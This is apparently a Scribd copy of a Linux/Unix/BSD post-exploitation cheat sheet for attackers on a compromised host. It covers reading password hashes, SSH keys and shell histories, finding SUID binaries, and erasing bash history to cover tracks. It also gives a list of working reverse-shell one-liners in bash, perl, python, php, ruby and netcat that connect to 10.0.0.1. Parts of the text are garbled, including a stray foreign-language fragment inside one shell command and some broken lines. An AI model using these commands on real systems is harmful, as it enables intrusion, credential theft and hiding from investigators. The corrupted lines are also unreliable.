Scribd
Upload
74 views

Linux/Unix/BSD Post-Exploitation Command List

This document contains a list of Linux, Unix, and BSD post-exploitation commands organized into categories such as blind files, system information commands, networking commands, configuration files, determining the distro, installed packages, package sources, finding important files, covering tracks, actions per user, reverse shells, and fun commands if the attacker has gained root access. The commands are presented briefly without descriptions.

Uploaded by

bobs20
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
74 views

Linux/Unix/BSD Post-Exploitation Command List

This document contains a list of Linux, Unix, and BSD post-exploitation commands organized into categories such as blind files, system information commands, networking commands, configuration files, determining the distro, installed packages, package sources, finding important files, covering tracks, actions per user, reverse shells, and fun commands if the attacker has gained root access. The commands are presented briefly without descriptions.

Uploaded by

bobs20
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

Linux/Unix/BSD Post-Exploitation Command List.

If for any reason you cannot access/edit these files in the future, please contact [email protected]

Table of Contents
Linux/Unix/BSD Post-Exploitation Command List. Table of Contents Blind Files System Networking Configs Determine Distro: Installed Packages Package Sources Finding Important Files Covering Your Tracks Actions Per User Priv (sudod or as root) Reverse Shell Fun if Win

Blind Files
(things to pull when all you can do is blindly read) LFI/dir traversal (Dont forget %00!) File /etc/resolv.conf Contents and Reason Contains the current name servers (DNS) for the system. This is a global read file that is less likely to trigger IDS alerts than /etc/passwd Message of the Day. Debian - current version of distro List of users as well List of users password hashes (requires root)

/etc/motd /etc/issue /etc/passwd /etc/shadow

System
Command uname -a ps aux top -n 1 -b id arch w who -a Description and/or Reason Prints the kernel version and...

gcc -v mysql --version perl -v ruby -v python --version df -k

mount last -a lastlog lastlogin (*bsd) getenforce dmesg lspci lsusb lshw free -m cat /proc/cpuinfo cat /proc/meminfo du -h --max-depth=1 / which nmap (see if its already installed) locate bin/nmap which nc (see if its already installed) locate bin/<whatever you want> whoami jps -l java -version

Networking
hostname -f ip addr show ifconfig -a route -n cat /etc/network/interfaces iptables -L -n iptables-save netstat -anop netstat -r netstat -nltupw (root with raw sockets) arp -a lsof -nPi

Configs
ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null cat /etc/issue{,.net} cat /etc/passwd cat /etc/shadow (gotta try..) cat /etc/shadow~ # (sometimes there when edited with gedit) cat /etc/master.passwd cat /etc/group cat /etc/hosts cat /etc/crontab

cat /etc/sysctl.conf for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons) cat /etc/resolv.conf cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /opt/lampp/etc/httpd.conf cat /etc/samba/smb.conf cat /etc/openldap/ldap.conf cat /etc/ldap/ldap.conf pdbedit -L -w pdbedit -L -v cat /etc/exports cat /etc/auto.master cat /etc/auto_master cat /etc/fstab cat /etc/exports find /etc/sysconfig/ -type f -exec cat {} \; cat /etc/sudoers

Determine Distro:
cat /etc/*release /etc/SUSE-release /etc/redhat-release, /etc/redhat_version /etc/fedora-release /etc/slackware-release, /etc/slackware-version /etc/debian_release, /etc/debian_version, /etc/mandrake-release /etc/sun-release /etc/release /etc/gentoo-release /etc/lsb-release /etc/rc.conf arch # on OpenBSD sample: OpenBSD.amd64 uname -a (often hints at it pretty well) # Novell SUSE # Red Hat # Fedora # Slackware # Debian # Mandrake # Sun JDS # Solaris/Sparc # Gentoo # ubuntu # arch linux

Installed Packages
rpm -qa --last | head yum list | grep installed dpkg -l dpkg -l |grep -i linux-image

pkg_info

# FreeBSD

Package Sources
cat /etc/apt/sources.list ls -l /etc/yum.repos.d/ cat /etc/yum.conf

Finding Important Files


find /var/log -type f -exec ls -la {} \; ls -alhtr /mnt ls -alhtr /media ls -alhtr /tmp ls -alhtr /home cd /home/; tree ls /home/*/.ssh/* find /home -type f -iname '.*history' ls -lart /etc/rc.d/ locate tar | grep [.]tar$ locate tgz | grep [.]tgz$ locate sql l grep [.]sql$ locate settings | grep [.]php$ locate config.inc | grep [.]php$ ls /home/*/id* locate .properties | grep [.]properties # java config files locate .xml | grep [.]xml # java/.net config files find /sbin /usr/sbin /opt /lib `echo $PATH | sed s/:/ /g` -perm -4000 # find suids locate rhosts

Covering Your Tracks


export HISTFILE= This next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out: rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null (invasive) touch ~/.bash_history (invasive) <space> history -c (using a space before a command

Actions Per User


ls -alh /home/*/

ls -alh /home/*/.ssh/ cat /home/*/.ssh/authorized_keys cat /home/*/.ssh/known_hosts cat /home/*/.*hist* find -type f /home/*/.vnc /home/*/.subversion grep ^ssh /home/*/.*hist* grep ^telnet `/home/*/.*hist* grep ^mysql /home/*/.*hist* cat /home/*/.viminfo sudo -l # if sudoers is not readable, this sometimes works per user crontab -l cat /home/*/.mysql_history

Priv (sudod or as root)


ls -alh /root/ cat /etc/sudoers cat /etc/shadow cat /etc/master.passwd # OpenBSD cat /var/spool/cron/crontabs/* | cat /var/spool/cron/* lsof -nPi ls /home/*/.ssh/*

Reverse Shell
starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet bash -i >& /dev/tcp/10.0.0.1/8080 0>&1a produktivnost na denn rutiny byla nepedstavibash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp") );if(connect(S,sockaddr_in($p,inet_aton($i)))) {open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STR EAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does NOT

support -e anymore

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f xterm -display 10.0.0.1:1 Listener- Xnest :1 Add permission to connect- xhost +victimIP

Fun if Win
If tux is a parallel O.S. installed with Windows and the logged-in user access level includes those Windows partition, attacker can mount them up and do a much deeper information gathering, credential theft and root-ing.

## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN -=SYSTEM=Command uname -a ps aux id w who -a Expected and / or Sample Output Linux kernel version, distribution List of running processes List current user and group along with user/group id Show about who is logged,they are doing Print information about about users

cat /dev/core >/dev/audi cat /dev/mem >/dev/audioo

You might also like